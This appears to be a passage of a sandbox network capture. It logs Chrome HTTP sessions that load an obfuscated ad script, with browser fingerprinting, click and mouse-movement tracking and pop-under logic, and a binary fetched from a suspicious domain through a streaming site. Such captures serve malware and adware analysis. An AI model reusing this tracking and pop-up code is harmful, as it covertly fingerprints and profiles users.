                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>F9yyyy.I='//d2w9cdu84xc4eq.cloudfront.net/lMHl4TDlTFhYqBkQQHHEIAEBKfg4IXwg+XFZEHj9RUQsdOE8eGhdqU0MWFjwEdhEwOEAFSR5/CHg+IAgfRAMccRQFXxQtV1dEXilXU0RJalhUG0V4H0QJFycEWxsWKExTFQIgUhYMGXFUXwMRIFVRXEoKDB5JXX4JGA4RIl1fDgtpCwAXD


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          46192.168.2.1649765108.158.71.1404436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:59 UTC367OUTGET /?udcwd=1092278 HTTP/1.1
                                                                                                                                                                                          Host: d2w9cdu84xc4eq.cloudfront.net
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:00 UTC439INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Length: 232628
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:00 GMT
                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                          Cache-Control: no-store, no-cache, proxy-revalidate, must-revalidate, private, no-transform
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                          Via: 1.1 1aea7e24169d7c704c98c2fee9cab32e.cloudfront.net (CloudFront)
                                                                                                                                                                                          X-Amz-Cf-Pop: BAH53-P2
                                                                                                                                                                                          X-Amz-Cf-Id: SKdBYzhCXQ6hyfOcYk6cEVHR5oNVCI9ttpz33i1Mve5-ALn7pn1ssw==
                                                                                                                                                                                          2024-12-15 11:38:00 UTC16384INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 46 69 6e 67 65 72 70 72 69 6e 74 4a 53 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 3c 72 3b 74 2b 2b 29 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 65 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 6f 29 26 26 28 6e 5b 6f 5d 3d 65 5b 6f 5d 29 3b 72 65 74 75 72 6e 20 6e 7d 2c 65 2e 61 70 70 6c 79 28 74 68 69 73 2c
                                                                                                                                                                                          Data Ascii: (function(){var FingerprintJS=function(n){"use strict";var e=function(){return e=Object.assign||function(n){for(var e,t=1,r=arguments.length;t<r;t++)for(var o in e=arguments[t])Object.prototype.hasOwnProperty.call(e,o)&&(n[o]=e[o]);return n},e.apply(this,
                                                                                                                                                                                          2024-12-15 11:38:00 UTC16384INData Raw: 7d 5d 2c 73 65 72 69 66 3a 5b 7b 66 6f 6e 74 46 61 6d 69 6c 79 3a 22 73 65 72 69 66 22 7d 5d 2c 73 61 6e 73 3a 5b 7b 66 6f 6e 74 46 61 6d 69 6c 79 3a 22 73 61 6e 73 2d 73 65 72 69 66 22 7d 5d 2c 6d 6f 6e 6f 3a 5b 7b 66 6f 6e 74 46 61 6d 69 6c 79 3a 22 6d 6f 6e 6f 73 70 61 63 65 22 7d 5d 2c 6d 69 6e 3a 5b 7b 66 6f 6e 74 53 69 7a 65 3a 22 31 70 78 22 7d 5d 2c 73 79 73 74 65 6d 3a 5b 7b 66 6f 6e 74 46 61 6d 69 6c 79 3a 22 73 79 73 74 65 6d 2d 75 69 22 7d 5d 7d 3b 76 61 72 20 62 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 77 69 6e 64 6f 77 3b 3b 29 7b 76 61 72 20 65 3d 6e 2e 70 61 72 65 6e 74 3b 69 66 28 21 65 7c 7c 65 3d 3d 3d 6e 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 69 66 28 65 2e 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 21
                                                                                                                                                                                          Data Ascii: }],serif:[{fontFamily:"serif"}],sans:[{fontFamily:"sans-serif"}],mono:[{fontFamily:"monospace"}],min:[{fontSize:"1px"}],system:[{fontFamily:"system-ui"}]};var bn=function(){for(var n=window;;){var e=n.parent;if(!e||e===n)return!1;try{if(e.location.origin!
                                                                                                                                                                                          2024-12-15 11:38:00 UTC11910INData Raw: 61 6e 3a 64 28 2d 31 65 33 30 30 29 2c 74 61 6e 68 3a 66 28 31 29 2c 74 61 6e 68 50 66 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 28 76 6e 2e 65 78 70 28 32 2a 6e 29 2d 31 29 2f 28 76 6e 2e 65 78 70 28 32 2a 6e 29 2b 31 29 7d 28 31 29 2c 65 78 70 3a 6d 28 31 29 2c 65 78 70 6d 31 3a 76 28 31 29 2c 65 78 70 6d 31 50 66 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 76 6e 2e 65 78 70 28 6e 29 2d 31 7d 28 31 29 2c 6c 6f 67 31 70 3a 68 28 31 30 29 2c 6c 6f 67 31 70 50 66 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 76 6e 2e 6c 6f 67 28 31 2b 6e 29 7d 28 31 30 29 2c 70 6f 77 50 49 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 76 6e 2e 70 6f 77 28 76 6e 2e 50 49 2c 6e 29 7d 28 2d 31 30 30 29 7d 7d 2c 70 64
                                                                                                                                                                                          Data Ascii: an:d(-1e300),tanh:f(1),tanhPf:function(n){return(vn.exp(2*n)-1)/(vn.exp(2*n)+1)}(1),exp:m(1),expm1:v(1),expm1Pf:function(n){return vn.exp(n)-1}(1),log1p:h(10),log1pPf:function(n){return vn.log(1+n)}(10),powPI:function(n){return vn.pow(vn.PI,n)}(-100)}},pd
                                                                                                                                                                                          2024-12-15 11:38:00 UTC5792INData Raw: 61 6c 54 69 6d 65 43 61 6c 63 75 6c 61 74 65 64 3a 30 2c 63 6c 69 63 6b 43 6f 75 6e 74 3a 30 2c 62 75 74 74 6f 6e 43 6c 69 63 6b 43 6f 75 6e 74 3a 30 2c 6c 69 6e 6b 43 6c 69 63 6b 43 6f 75 6e 74 3a 30 2c 6b 65 79 70 72 65 73 73 43 6f 75 6e 74 3a 30 2c 73 63 72 6f 6c 6c 43 6f 75 6e 74 3a 30 2c 6d 6f 75 73 65 4d 6f 76 65 6d 65 6e 74 43 6f 75 6e 74 3a 30 7d 7d 2c 31 45 33 29 7d 66 75 6e 63 74 69 6f 6e 20 4a 61 28 29 7b 72 65 74 75 72 6e 22 26 75 74 72 31 3d 22 2b 0a 65 5b 22 75 74 72 5f 22 2b 77 5d 2e 74 6f 74 61 6c 54 69 6d 65 2b 22 26 75 74 72 32 3d 22 2b 65 5b 22 75 74 72 5f 22 2b 77 5d 2e 6d 6f 75 73 65 4d 6f 76 65 6d 65 6e 74 43 6f 75 6e 74 2b 22 26 75 74 72 33 3d 22 2b 65 5b 22 75 74 72 5f 22 2b 77 5d 2e 63 6c 69 63 6b 43 6f 75 6e 74 2b 22 26 75 74 72
                                                                                                                                                                                          Data Ascii: alTimeCalculated:0,clickCount:0,buttonClickCount:0,linkClickCount:0,keypressCount:0,scrollCount:0,mouseMovementCount:0}},1E3)}function Ja(){return"&utr1="+e["utr_"+w].totalTime+"&utr2="+e["utr_"+w].mouseMovementCount+"&utr3="+e["utr_"+w].clickCount+"&utr
                                                                                                                                                                                          2024-12-15 11:38:00 UTC2896INData Raw: 29 2b 38 29 7d 2c 74 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 0a 30 21 3d 61 3f 31 3d 3d 61 3f 21 30 3a 61 3e 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3a 21 31 7d 2c 4a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 48 61 73 68 53 65 74 24 5f 63 6f 6e 74 61 69 6e 65 72 3d 7b 7d 7d 3b 4a 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 73 68 53 65 74 5f 70 72 6f 74 6f 74 79 70 65 24 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 64 65 6c 65 74 65 20 74 68 69 73 2e 48 61 73 68 53 65 74 24 5f 63 6f 6e 74 61 69 6e 65 72 5b 61 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 4a 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 73 68 53 65 74 5f 70 72 6f 74 6f 74 79 70 65 24 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72
                                                                                                                                                                                          Data Ascii: )+8)},tb=function(a){return a&&0!=a?1==a?!0:a>=Math.random():!1},J=function(){this.HashSet$_container={}};J.prototype.HashSet_prototype$remove=function(a){delete this.HashSet$_container[a];return this};J.prototype.HashSet_prototype$contains=function(a){r
                                                                                                                                                                                          2024-12-15 11:38:00 UTC16384INData Raw: 3e 76 3f 28 7a 3d 75 5e 74 26 28 70 5e 75 29 2c 77 3d 28 35 2a 76 2b 31 29 25 31 36 29 3a 34 38 3e 76 3f 28 7a 3d 70 5e 75 5e 74 2c 77 3d 28 33 2a 76 2b 35 29 25 31 36 29 3a 28 7a 3d 75 5e 28 70 7c 7e 74 29 2c 77 3d 37 2a 76 25 31 36 29 2c 78 3d 74 2c 74 3d 75 2c 75 3d 70 2c 6d 3d 6d 2b 7a 2b 63 5b 76 5d 2b 66 5b 68 2b 77 5d 2c 7a 3d 62 5b 76 5d 2c 70 2b 3d 6d 3c 3c 7a 7c 6d 3e 3e 3e 33 32 2d 7a 2c 6d 3d 78 3b 65 3d 65 2b 6d 7c 30 3b 6b 3d 6b 2b 70 7c 30 3b 6e 3d 6e 2b 75 7c 30 3b 67 3d 67 2b 74 7c 30 7d 72 65 74 75 72 6e 20 64 28 65 29 2b 64 28 6b 29 2b 0a 64 28 6e 29 2b 64 28 67 29 7d 7d 29 28 29 3b 76 61 72 20 48 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 54 62 3d 7b 7d 2c 78 3d 7b 57 49 4e
                                                                                                                                                                                          Data Ascii: >v?(z=u^t&(p^u),w=(5*v+1)%16):48>v?(z=p^u^t,w=(3*v+5)%16):(z=u^(p|~t),w=7*v%16),x=t,t=u,u=p,m=m+z+c[v]+f[h+w],z=b[v],p+=m<<z|m>>>32-z,m=x;e=e+m|0;k=k+p|0;n=n+u|0;g=g+t|0}return d(e)+d(k)+d(n)+d(g)}})();var H=navigator.userAgent.toLowerCase(),Tb={},x={WIN
                                                                                                                                                                                          2024-12-15 11:38:00 UTC992INData Raw: 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 22 2c 2d 31 29 3b 65 6c 73 65 7b 76 61 72 20 6b 3d 6e 65 77 20 58 44 6f 6d 61 69 6e 52 65 71 75 65 73 74 3b 6b 2e 6f 70 65 6e 28 61 2c 62 29 3b 6b 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 28 6b 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 2e 74 72 69 6d 28 29 2c 32 30 30 29 7d 3b 6b 2e 6f 6e 70 72 6f 67 72 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 6b 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 28 22 22 2c 2d 31 29 7d 3b 66 26 26 28 6b 2e 74 69 6d 65 6f 75 74 3d 66 2c 6b 2e 6f 6e 74 69 6d 65 6f 75 74 3d 6b 2e 6f 6e 65 72 72 6f 72 29 3b 76 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6b 2e 73 65 6e 64 28 6e 7c 7c 22 22 29 7d 2c 0a 30 29 7d 7d 2c 6d 65 3d 58 4d 4c 48 74 74 70 52 65 71
                                                                                                                                                                                          Data Ascii: ot implemented",-1);else{var k=new XDomainRequest;k.open(a,b);k.onload=function(){c(k.responseText.trim(),200)};k.onprogress=function(){};k.onerror=function(){d("",-1)};f&&(k.timeout=f,k.ontimeout=k.onerror);v(function(){k.send(n||"")},0)}},me=XMLHttpReq
                                                                                                                                                                                          2024-12-15 11:38:01 UTC16384INData Raw: 61 2c 62 29 3b 65 6c 73 65 7b 76 61 72 20 66 3d 61 2e 73 70 6c 69 74 28 22 3b 22 2c 32 29 2c 65 3b 61 26 26 36 3e 61 2e 6c 65 6e 67 74 68 3f 28 75 28 68 2e 41 53 59 4e 43 5f 4e 4f 5f 43 4f 56 45 52 41 47 45 29 2c 65 3d 21 31 29 3a 32 3e 66 2e 6c 65 6e 67 74 68 7c 7c 70 61 72 73 65 49 6e 74 28 66 5b 30 5d 2c 31 30 29 21 3d 3d 6b 62 28 66 5b 31 5d 2e 74 6f 53 74 72 69 6e 67 28 29 29 3f 28 7a 28 68 2e 41 53 59 4e 43 5f 43 52 43 5f 43 4f 52 52 55 50 54 49 4f 4e 2c 61 29 2c 65 3d 21 31 29 3a 65 3d 21 30 3b 65 3f 63 28 66 5b 31 5d 2c 62 29 3a 64 28 61 2c 62 29 7d 7d 2c 64 2c 66 2c 65 2c 67 29 7d 2c 69 73 41 6a 61 78 43 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3a 53 55 50 50 4f 52 54 5f 49 45 38 26 26 6d 2e 6d 73 69 65 28 29 26 26 31 30 3e 6d 2e 64 65 74 65 63 74 56
                                                                                                                                                                                          Data Ascii: a,b);else{var f=a.split(";",2),e;a&&6>a.length?(u(h.ASYNC_NO_COVERAGE),e=!1):2>f.length||parseInt(f[0],10)!==kb(f[1].toString())?(z(h.ASYNC_CRC_CORRUPTION,a),e=!1):e=!0;e?c(f[1],b):d(a,b)}},d,f,e,g)},isAjaxCookieEnabled:SUPPORT_IE8&&m.msie()&&10>m.detectV
                                                                                                                                                                                          2024-12-15 11:38:01 UTC16384INData Raw: 61 6e 64 20 70 61 67 65 20 70 6f 70 22 2c 22 77 61 72 6e 22 29 3b 63 2e 70 75 73 68 28 48 65 2e 44 41 54 41 5f 43 4f 52 52 55 50 54 49 4f 4e 29 3b 68 61 2e 72 65 73 65 74 44 61 74 61 28 61 29 3b 72 65 74 75 72 6e 20 51 2e 66 72 65 73 68 28 29 7d 2c 48 65 3d 7b 44 41 54 41 5f 43 4f 52 52 55 50 54 49 4f 4e 3a 30 7d 3b 65 2e 4c 41 53 54 5f 43 4f 52 52 45 43 54 5f 45 56 45 4e 54 5f 54 49 4d 45 3d 30 3b 76 61 72 20 49 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 49 6e 4d 69 6c 6c 69 73 3d 2d 31 21 3d 61 3f 61 3a 63 2e 69 6e 74 65 72 76 61 6c 42 65 74 77 65 65 6e 50 6f 70 73 3b 74 68 69 73 2e 73 65 72 76 69 6e 67 4d 65 74 68 6f 64 49 64 3d 62 7d 2c 55 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 66 29 7b
                                                                                                                                                                                          Data Ascii: and page pop","warn");c.push(He.DATA_CORRUPTION);ha.resetData(a);return Q.fresh()},He={DATA_CORRUPTION:0};e.LAST_CORRECT_EVENT_TIME=0;var Ie=function(a,b,c){this.intervalInMillis=-1!=a?a:c.intervalBetweenPops;this.servingMethodId=b},U=function(a,b,c,d,f){
                                                                                                                                                                                          2024-12-15 11:38:01 UTC16384INData Raw: 3b 4b 2e 74 72 69 67 67 65 72 24 28 45 62 2c 54 61 29 7d 2c 21 30 2c 65 2e 64 6f 63 75 6d 65 6e 74 29 3b 76 61 72 20 48 64 3d 4e 41 4d 45 53 50 41 43 45 2b 22 5f 63 74 75 63 22 2c 49 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 49 53 5f 50 55 53 48 5f 50 52 4f 44 55 43 54 26 26 37 36 3d 3d 3d 5a 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 28 69 50 6f 64 7c 69 50 68 6f 6e 65 7c 69 50 61 64 29 2f 29 26 26 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 41 70 70 6c 65 57 65 62 4b 69 74 2f 29 26 26 28 46 45 41 54 55 52 45 53 2e 55 4e 43 41 50 50 45 44 5f 53 45 4c 45 43 54 4f 52 3d 21 30 29 3b 72 65 74 75 72 6e 20 5f 5f 43 48 45 43 4b 5f 46 45 41 54 55 52 45 5f 5f 28 46 45 41 54 55 52 45
                                                                                                                                                                                          Data Ascii: ;K.trigger$(Eb,Ta)},!0,e.document);var Hd=NAMESPACE+"_ctuc",Id=function(a){IS_PUSH_PRODUCT&&76===Z&&navigator.userAgent.match(/(iPod|iPhone|iPad)/)&&navigator.userAgent.match(/AppleWebKit/)&&(FEATURES.UNCAPPED_SELECTOR=!0);return __CHECK_FEATURE__(FEATURE


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          47192.168.2.1649774104.21.48.14436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:00 UTC548OUTGET /asd100.bin HTTP/1.1
                                                                                                                                                                                          Host: ukankingwithea.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Origin: https://fsharetv.co
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:20 UTC1064INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:20 GMT
                                                                                                                                                                                          Content-Type: binary/octet-stream
                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Access-Control-Allow-Origin: https://fsharetv.co
                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                          Access-Control-Allow-Headers: X-Requested-With, content-type
                                                                                                                                                                                          Cache-Control: max-age=14400
                                                                                                                                                                                          CF-Cache-Status: STALE
                                                                                                                                                                                          Age: 2163296
                                                                                                                                                                                          Last-Modified: Wed, 20 Nov 2024 10:43:24 GMT
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oPnoyFwb2ID5MPS4h7vTdGgg97uVutF9RGPz1amj%2BUMhRchCIyvsyi7IaehWxi%2BJWl8yP2CD0iLKJf212iR6I02BddBQkt0qxONKHSsIWRL%2BqyXcy7D0SlkLWhMoOcz8HEFLveI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f26251a585543be-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1550&rtt_var=587&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1126&delivery_rate=1852791&cwnd=226&unsent_bytes=0&cid=dde39c5f7e86388a&ts=19833&x=0"
                                                                                                                                                                                          2024-12-15 11:38:20 UTC305INData Raw: 37 63 35 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii: 7c50
                                                                                                                                                                                          2024-12-15 11:38:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          2024-12-15 11:38:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          2024-12-15 11:38:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          2024-12-15 11:38:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          2024-12-15 11:38:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          2024-12-15 11:38:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
